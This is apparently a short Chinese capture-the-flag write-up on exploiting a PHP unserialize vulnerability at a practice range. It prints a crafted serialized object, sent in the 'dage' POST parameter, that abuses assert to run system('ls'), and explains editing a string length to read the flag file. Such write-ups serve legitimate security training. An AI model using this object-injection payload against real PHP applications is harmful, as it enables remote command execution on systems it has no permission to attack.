反序列化漏洞验证:unserialize反序列化

靶场地址:http://www.whalwl.site:8026/

解题准备:了解unserialize函数

解题思路:

1、将靶场提示代码搭建成网页,手动添加

$obj=new site();
echo serialize($obj);

2、访问网页获取反序列化后的字符串

使用dage参数传递反序列化字符串,尝试各种危险函数,最后assert成功了

反序列化漏洞验证:unserialize反序列化

反序列化漏洞验证:unserialize反序列化

3、 POST方式提交dage,执行ls命令,得到flag文件名

dage=O:4:"site":3:{s:3:"url";s:14:"www.whalwl.com";s:4:"name";s:6:"assert";s:5:"title";s:13:"system('ls');";}

反序列化漏洞验证:unserialize反序列化

 4、cat flag文件,注意箭头处要修改13为40(字符串的长度)

反序列化漏洞验证:unserialize反序列化

上一篇:Laravel发送邮件


下一篇:Shiro-SecurityManager解析